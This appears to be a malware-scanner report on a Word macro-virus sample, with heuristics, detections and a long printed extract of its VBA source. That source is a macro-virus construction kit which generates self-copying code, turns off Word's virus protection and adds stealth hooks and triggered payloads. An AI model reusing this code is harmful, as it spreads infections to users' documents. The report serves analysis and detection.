Verdict: MALICIOUS
Risk Score: 258
Malware Insights
MITRE ATT&CK
T1566.001 Spearphishing Attachment
T1059.005 Visual Basic
The sample contains legacy WordBasic macro-virus markers and VBA macros, including AutoOpen and Auto_Close, indicating malicious intent. The document body presents a deceptive End-User License Agreement for a "VicodinES Macro-Poppy Construction Kit" to trick users into enabling macros. The presence of these elements strongly suggests the file is a macro-based malware dropper, likely designed to download and execute further payloads.
Heuristics 8
- VBA macros detected | medium | 3 related findings | OLE_VBA_MACROS: Document contains VBA macro code
- VBA macro-virus self-replication / AV tampering | critical | OLE_VBA_MACRO_VIRUS_REPLICATION: VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature. Matched line in script: Print #hFile, " .VirusProtection = False"
- AutoOpen macro | low | OLE_VBA_AUTOOPEN: AutoOpen macro. Matched line in script: Sub AutoOpen()
- Auto_Close macro | low | OLE_VBA_AUTOCLOSE: Auto_Close macro. Matched line in script: Print #hFile, "Sub AutoClose()"
- Heap-spray pattern detected | high | SC_HEAP_SPRAY: Repeated 0x06 bytes found. Disassembly hidden — these bytes score as degenerate, not coherent x86 code (single mnemonic 'push' is 79% of instructions — a sled or padding/filler run, not program logic).
- Legacy WordBasic macro-virus markers | high | OLE_LEGACY_WORDBASIC_MACRO_VIRUS: OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
- NOP-equivalent sled detected | medium | SC_NOP_EQUIV_SLED: Long run of 0x43 bytes. Disassembly hidden — these bytes score as data, not coherent x86 code (0/1 branch targets land on an instruction boundary (0% coherence)).
- Embedded URL | info | EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 225779 bytes |

SHA-256: 8e047ede91448e93e08da033596cbb96043b1a366c969dc60bafcd9030d0de32
Detection: ClamAV: Win.Trojan.C-286
Obfuscation or payload: unlikely
Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "WelcomeFrm"
Attribute VB_Base = "0{B82BFB8D-9023-11D1-9F3B-444553540000}{B82BFA40-9023-11D1-9F3B-444553540000}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub Begin1Btn_Click()
WelcomeFrm.Hide
PoppyStartFrm.Show
End Sub
Private Sub ExitBtn_Click()
ActiveDocument.Close
End
End Sub
Private Sub Image1_Click()
MsgBox "No info here but... there are a few hidden hints and bits of information to be found.", vbExclamation, "The Narkotic Network"
End Sub
Attribute VB_Name = "VMPCK"
Public Payload As Integer
Public Trigger As Integer
Public Noise As Integer
Public Stealth As Integer
Public Message As Integer
Public Skip As Integer
Public noname As Integer
Public RandomSetting As Integer
Public BMonth As Integer
Public BDay As Integer
Public PDay As Integer
Public PMonth As Integer
Public vname As String
Public xauthor As String
Public xsubject As String
Public xtitle As String
Public xkeywords As String
Public xcomments As String
Public BGTxt As String
Public RMT As String
Public HA As String
Public URL As String
Public ReplaceT As String
Public WithT As String
Public BG As Boolean
Public SE As Boolean
Public RM As Boolean
Public HAT As Boolean
Public NoHead As Boolean
Public FSA As Boolean
Public EF As Boolean
Public AO As Boolean
Public AC As Boolean
Public AEXIT As Boolean
Public AEXEC As Boolean
Public FP As Boolean
Public FS As Boolean
Public FC As Boolean
Public FE As Boolean
Public TOOL As Boolean
Public FN As Boolean
Public ROR_X As Boolean
Public ID_X As Boolean
Public DP_X As Boolean
Public PPWeb As Boolean
Sub AutoOpen()
PMonth = 0
PDay = 0
BMonth = 0
BDay = 0
Skip = 0
Payload = 0
Trigger = 0
Noise = 0
Stealth = 0
Message = 0
noname = 0
WelcomeFrm.Show
End Sub
Sub BuildPoppy(strFile As String)
Dim hFile As Long
Randomize
VirusName$ = vname
rvdie1 = Int(Rnd * 13) + 1
rvdie2 = Int(Rnd * 13) + 1
rvdie3 = Int(Rnd * 13) + 1
rvdie4 = Int(Rnd * 13) + 1
rvdie5 = Int(Rnd * 13) + 1
qran = Int(Rnd * 13) + 1
If rvdie1 = 1 Then sel1$ = "lkasdjf"
If rvdie1 = 2 Then sel1$ = "asldifj"
If rvdie1 = 3 Then sel1$ = "asdfwqe"
If rvdie1 = 4 Then sel1$ = "mplijre"
If rvdie1 = 5 Then sel1$ = "erwtjky"
If rvdie1 = 6 Then sel1$ = "spavoiu"
If rvdie1 = 7 Then sel1$ = "vsoiuwe"
If rvdie1 = 8 Then sel1$ = "asfliuv"
If rvdie1 = 9 Then sel1$ = "wquwiqn"
If rvdie1 = 10 Then sel1$ = "wqeziou"
If rvdie1 = 11 Then sel1$ = "wqeiuzv"
If rvdie1 = 12 Then sel1$ = "qwzpiuc"
If rvdie1 = 13 Then sel1$ = "qppoiuc"
If rvdie2 = 1 Then sel2$ = "lkasdf"
If rvdie2 = 2 Then sel2$ = "asldij"
If rvdie2 = 3 Then sel2$ = "asdfqe"
If rvdie2 = 4 Then sel2$ = "mpljre"
If rvdie2 = 5 Then sel2$ = "ertjky"
If rvdie2 = 6 Then sel2$ = "savoiu"
If rvdie2 = 7 Then sel2$ = "vsiuwe"
If rvdie2 = 8 Then sel2$ = "asfiuv"
If rvdie2 = 9 Then sel2$ = "wquwqn"
If rvdie2 = 10 Then sel2$ = "wqezou"
If rvdie2 = 11 Then sel2$ = "wqeizv"
If rvdie2 = 12 Then sel2$ = "qwziuc"
If rvdie2 = 13 Then sel2$ = "qpoiuc"
If rvdie3 = 1 Then sel3$ = "lkasswe"
If rvdie3 = 2 Then sel3$ = "aswerij"
If rvdie3 = 3 Then sel3$ = "asdfwer"
If rvdie3 = 4 Then sel3$ = "mpwerre"
If rvdie3 = 5 Then sel3$ = "ewerjky"
If rvdie3 = 6 Then sel3$ = "savower"
If rvdie3 = 7 Then sel3$ = "weriuwe"
If rvdie3 = 8 Then sel3$ = "asfrwev"
If rvdie3 = 9 Then sel3$ = "wqwerrn"
If rvdie3 = 10 Then sel3$ = "wqrtyrt"
If rvdie3 = 11 Then sel3$ = "wqrtyzv"
If rvdie3 = 12 Then sel3$ = "qzyriuc"
If rvdie3 = 13 Then sel3$ = "qrtyrtc"
If rvdie4 = 1 Then sel4$ = "yyyyswe"
If rvdie4 = 2 Then sel4$ = "sdgerrij"
If rvdie4 = 3 Then sel4$ = "asdretr"
If rvdie4 = 4 Then sel4$ = "mjtytrre"
If rvdie4 = 5 Then sel4$ = "eyuijky"
If rvdie4 = 6 Then sel4$ = "styuwer"
If rvdie4 = 7 Then sel4$ = "wwqeiuwe"
If rvdie4 = 8 Then sel4$ = "aswewev"
If rvdie4 = 9 Then sel4$ = "wqwewen"
If rvdie4 = 10 Then sel4$ = "wqryuyt"
If rvdie4 = 11 Then sel4$ = "wxvcyzv"
If rvdie4 = 12 Then sel4$ = "tutrriuc"
If rvdie4 = 13 Then sel4$ = "qtrurtc"
If rvdie5 = 1 Then sel5$ = "uiterey"
If rvdie5 = 2 Then sel5$ = "vailiaq"
If rvdie5 = 3 Then sel5$ = "mrewtne"
If rvdie5 = 4 Then sel5$ = "viubuxb"
If rvdie5 = 5 Then sel5$ = "mmmbibi"
If rvdie5 = 6 Then sel5$ = "mopghgj"
If rvdie5 = 7 Then sel5$ = "wrwetvz"
If rvdie5 = 8 Then sel5$ = "qwertre"
If rvdie5 = 9 Then sel5$ = "muytruyt"
If rvdie5 = 10 Then sel5$ = "buttchee"
If rvdie5 = 11 Then sel5$ = "fuckosd"
If rvdie5 = 12 Then sel5$ = "aewpqer"
If rvdie5 = 13 Then sel5$ = "myasshole"
If qran = 1 Then quote$ = "Bad Ideas for Bad People"
If qran = 2 Then quote$ = "Christianity is Nothing More Than a Poorly Thought-out Moral Safety Net"
If qran = 3 Then quote$ = "Social Camouflage for This Modern Age"
If qran = 4 Then quote$ = "Live for Now"
If qran = 5 Then quote$ = "Pain, everyday..."
If qran = 6 Then quote$ = "Hurt, everything..."
If qran = 7 Then quote$ = "Loveless, all"
If qran = 8 Then quote$ = "Forever Never Happens"
If qran = 9 Then quote$ = "Mortality is Pure Evil"
If qran = 10 Then quote$ = "Let the dog die"
If qran = 11 Then quote$ = "Mentally out of service"
If qran = 12 Then quote$ = "Give me DRUGS!"
If qran = 13 Then quote$ = "Daddy's got a big o'l bag-a-chicken"
id1 = Int(Rnd * 9999)
id2 = Int(Rnd * 9999)
ID3 = id1 - id2
spam1 = Int(Rnd * 9999)
spam2 = Int(Rnd * 9999)
msfile$ = "f" & spam2 & "$"
sel5$ = sel5$ & id1
sel4$ = sel4$ & id2
sel3$ = sel3$ & id1 & id2
sel2$ = sel2$ & id2 & id1
sel1$ = sel1$ & spam1 & id1
pload$ = "p" & spam1
' Begin Write MacPoppy
hFile = FreeFile
Open strFile For Output Access Write As hFile
' Header and Start Of Virus Sub
Print #hFile, "Attribute VB_Name = """ + VirusName$ + """ "
' Set F|N Skip Trigger
If FN = True Then
Print #hFile, " "
Print #hFile, "Public Skip As Integer"
Print #hFile, " "
End If
Print #hFile, " "
Print #hFile, "Sub " + VirusName$ + "()"
If NoHead = False Then
Print #hFile, " "
Print #hFile, " 'Produced by The VicodinES Macro.Poppy Construction Kit"
Print #hFile, " '======================================================"
Print #hFile, " 'Code Written by VicodinES """ + quote$ + """"
Print #hFile, " 'Poppy ID : " & id1 & id2 & ID3
Print #hFile, " "
Print #hFile, " "
End If
Print #hFile, "On Error Resume Next"
If RM = True Or Trigger = 2 Then
Print #hFile, "Randomize"
End If
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
' Click The Basics
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Print #hFile, "With Options"
Print #hFile, " .ConfirmConversions = False"
Print #hFile, " .VirusProtection = False"
Print #hFile, " .SaveNormalPrompt = False"
Print #hFile, "End With"
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Print #hFile, "ActiveDocument.ReadOnlyRecommended = False"
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
' Do random number payload check
If Trigger = 2 Then
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Print #hFile, "check = Int(Rnd * " & RandomSetting & ")"
Print #hFile, "If check = 3 then Call " + pload$
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
End If
If RM = True Then
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Print #hFile, "rm = Int(Rnd * 100)"
Print #hFile, " If rm = 99 Then MsgBox """ & RMT & """,vbSystemModal"
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
End If
' If payload is Day/Date then set
If Trigger = 1 Then
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
If PDay = 100 Then Print #hFile, "If Month(Now()) = " & PMonth & " Then Call " + pload$
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
If PMonth = 100 Then Print #hFile, "If Day(Now()) = " & PDay & " Then Call " + pload$
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
If PDay < 100 And PMonth < 100 Then Print #hFile, "If Month(Now()) = " & PMonth & " And Day(Now()) = " & PDay & " Then Call " + pload$
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
End If
' Check if B-Day Greeting
If BG = True Then Print #hFile, "If Month(Now()) = " & BMonth & " And Day(Now()) = " & BDay & " Then MsgBox """ & BGTxt & """,vbinformation, ""Birthday Greeting!!!"""
' Set The Document Properties
If DP_X = True Then
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Print #hFile, "With Dialogs(wdDialogFileSummaryInfo)"
If DP_X = True And xauthor <> "" Then Print #hFile, " .Author = """ & xauthor & """"
If DP_X = True And xtitle <> "" Then Print #hFile, " .Title = """ & xtitle & """"
If DP_X = True And xsubject <> "" Then Print #hFile, " .Subject = """ & xsubject & """"
If DP_X = True And xcomments <> "" Then Print #hFile, " .Comments = """ & xcomments & """"
If DP_X = True And xkeywords <> "" Then Print #hFile, " .Keywords = """ & xkeywords & """"
Print #hFile, " .Execute"
Print #hFile, "End With"
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
End If
' Start of Infection Routine
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Print #hFile, sel2$ & rvdie3 & " = 0"
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Print #hFile, "set " & sel3$ & rvdie2 & " = MacroContainer"
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
' Check Read-Only Remover Status
If ROR_X = True Then
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Print #hFile, " " + msfile$ + " = ""c:\windows\startm~1\programs\startup\msfile.bat"""
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Print #hFile, sel1$ + " = GetAttr(NormalTemplate.FullName)"
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Print #hFile, "If " + sel1$ + " = vbReadOnly Then Call vBitchES(" + msfile$ + ")"
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Print #hFile, "If " + sel1$ + " = vbReadOnly + vbArchive Then Call vBitchES(" + msfile$ + ")"
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Print #hFile, "If " + sel1$ + " = vbReadOnly Then GoTo fuckoff"
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Print #hFile, "If " + sel1$ + " = vbReadOnly + vbArchive Then GoTo fuckoff"
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
End If
' Continue Infection Routine
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Print #hFile, "If " + sel3$ & rvdie2 & " = NormalTemplate Then " + sel2$ & rvdie3 & " = 1"
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Print #hFile, "If " + sel2$ & rvdie3 & " = 1 Then " + sel4$ & rvdie1 & " = NormalTemplate.FullName Else " + sel4$ & rvdie1 & " = ActiveDocument.FullName"
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Print #hFile, "If " + sel2$ & rvdie3 & " = 1 Then " + sel5$ & rvdie4 & " = ActiveDocument.FullName Else " + sel5$ & rvdie4 & " = NormalTemplate.FullName"
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Print #hFile, "Application.OrganizerCopy Source:=" + sel4$ & rvdie1 & ", Destination:=" + sel5$ & rvdie4 & ", Name:=""" + VirusName$ + """, Object:=wdOrganizerObjectProjectItems"
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
If FN = True Then
Print #hFile, "If " + sel2$ & rvdie3 & " = 1 and Skip <> 1 Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName"
End If
If FN = False Then
Print #hFile, "If " + sel2$ & rvdie3 & " = 1 Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName"
End If
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Print #hFile, "If " + sel2$ & rvdie3 & " = 0 Then"
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Print #hFile, " If NormalTemplate.Saved = False Then NormalTemplate.Save"
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Print #hFile, " End If"
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
' Icon Disco Call
If ID_X = True Then
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Print #hFile, " Call dhIconDisco(""C:\autorun.inf"")"
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
End If
' The End of Infection Routine
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Print #hFile, "fuckoff:"
Print #hFile, "End Sub"
' Build H|A Message Hook
If HAT = True Then
Print #hFile, "Sub HelpAbout()"
Print #hFile, " On Error Resume Next"
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Print #hFile, " MsgBox """ & HA & """,vbInformation"
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Print #hFile, "End Sub"
End If
' Build F|N Hook
If FN = True Then
Print #hFile, "Sub FileNew()"
Print #hFile, " On Error Resume Next"
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Print #hFile, " Call " + VirusName$
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Print #hFile, "Dialogs(wdDialogFileNew).Show"
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Print #hFile, " Skip = 1"
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Print #hFile, " Call " + VirusName$
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Print #hFile, "End Sub"
End If
' Build F|S Hook
If FS = True Then
Print #hFile, "Sub FileSave()"
Print #hFile, " On Error Resume Next"
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Print #hFile, " Call " + VirusName$
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Print #hFile, " ActiveDocument.Save"
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Print #hFile, "End Sub"
End If
' Build F|C Hook
If FC = True Then
Print #hFile, "Sub FileClose()"
Print #hFile, " On Error Resume Next"
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Print #hFile, " Call " + VirusName$
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Print #hFile, " If ActiveDocument.Saved = False Then ActiveDocument.Save"
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Print #hFile, " ActiveDocument.Close"
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Print #hFile, "End Sub"
End If
If TOOL = True Then
Print #hFile, "Sub ToolsOptions()"
Print #hFile, " On Error Resume Next"
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Print #hFile, "Dialogs(wdDialogToolsOptions).Show"
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Print #hFile, " Call " + VirusName$
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Print #hFile, "End Sub"
End If
If EF = True Then
Print #hFile, "Sub EditFind()"
Print #hFile, " On Error Resume Next"
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Print #hFile, "Dialogs(wdDialogEditFind).Show"
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Print #hFile, " Call " + VirusName$
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Print #hFile, "End Sub"
End If
If FSA = True Then
Print #hFile, "Sub FileSaveAs()"
Print #hFile, " On Error Resume Next"
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Print #hFile, "Dialogs(wdDialogFileSaveAs).Show"
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Print #hFile, " Call " + VirusName$
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Print #hFile, "End Sub"
End If
' Build F|C Hook
If FP = True Then
Print #hFile, "Sub FilePrint()"
Print #hFile, " On Error Resume Next"
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Print #hFile, "Dialogs (wdDialogFilePrint).Show "
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Print #hFile, " Call " + VirusName$
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Print #hFile, "End Sub"
End If
' Build F|E Hook
If FE = True Then
Print #hFile, "Sub FileExit()"
Print #hFile, " On Error Resume Next"
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Print #hFile, " Call " + VirusName$
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Print #hFile, " If ActiveDocument.Saved = False Then ActiveDocument.Save"
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Print #hFile, " Application.Quit"
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Print #hFile, "End Sub"
End If
' Build AutoOpen Hook
If AO = True Then
Print #hFile, "Sub AutoOpen()"
Print #hFile, " On Error Resume Next"
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Print #hFile, " Call " + VirusName$
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Print #hFile, "End Sub"
End If
' Build AutoExit Hook
If AEXIT = True Then
Print #hFile, "Sub AutoExit()"
Print #hFile, " On Error Resume Next"
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Print #hFile, " Call " + VirusName$
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Print #hFile, "End Sub"
End If
' Build AutoExec Hook
If AEXEC = True Then
Print #hFile, "Sub AutoExec()"
Print #hFile, " On Error Resume Next"
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Print #hFile, " Call " + VirusName$
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Print #hFile, "End Sub"
End If
' Build AutoClose Hook
If AC = True Then
Print #hFile, "Sub AutoClose()"
Print #hFile, " On Error Resume Next"
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Print #hFile, " Call " + VirusName$
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Print #hFile, "End Sub"
End If
' Build Stealth Hooks
If Stealth > 0 Or Trigger = 3 Then
Print #hFile, "Sub ToolsMacro()"
Print #hFile, " On Error Resume Next"
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
If Stealth > 1 Then Print #hFile, " Call " + VirusName$
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
If Trigger = 3 Then Print #hFile, " Call " + pload$
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
If SE = True Then Print #hFile, "MsgBox ""Word Basic Err =7"""
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Print #hFile, "End Sub"
End If
If Stealth > 0 Or Trigger = 3 Then
Print #hFile, "Sub FileTemplates()"
Print #hFile, " On Error Resume Next"
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
If Stealth > 1 Then Print #hFile, " Call " + VirusName$
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
If Trigger = 3 Then Print #hFile, " Call " + pload$
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
If SE = True Then Print #hFile, "MsgBox ""Word Basic Err =7"""
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Print #hFile, "End Sub"
End If
If Stealth > 0 Or Trigger = 3 Then
Print #hFile, "Sub ViewVBCode()"
Print #hFile, " On Error Resume Next"
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
If Stealth > 1 Then Print #hFile, " Call " + VirusName$
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
If Trigger = 3 Then Print #hFile, " Call " + pload$
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
If SE = True Then Print #hFile, "MsgBox ""Word Basic Err =7"""
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Print #hFile, "End Sub"
End If
' Build Payload
If Trigger > 0 Then
Print #hFile, "Sub " & pload$ & "()"
Print #hFile, " On Error Resume Next"
If Payload = 1 Then
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Print #hFile, " ActiveDocument.FollowHyperlink Address:= _"
Print #hFile, """" & URL & """ _"
Print #hFile, " , NewWindow:=False, AddHistory:=True"
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas")
End If
If Payload = 2 Then
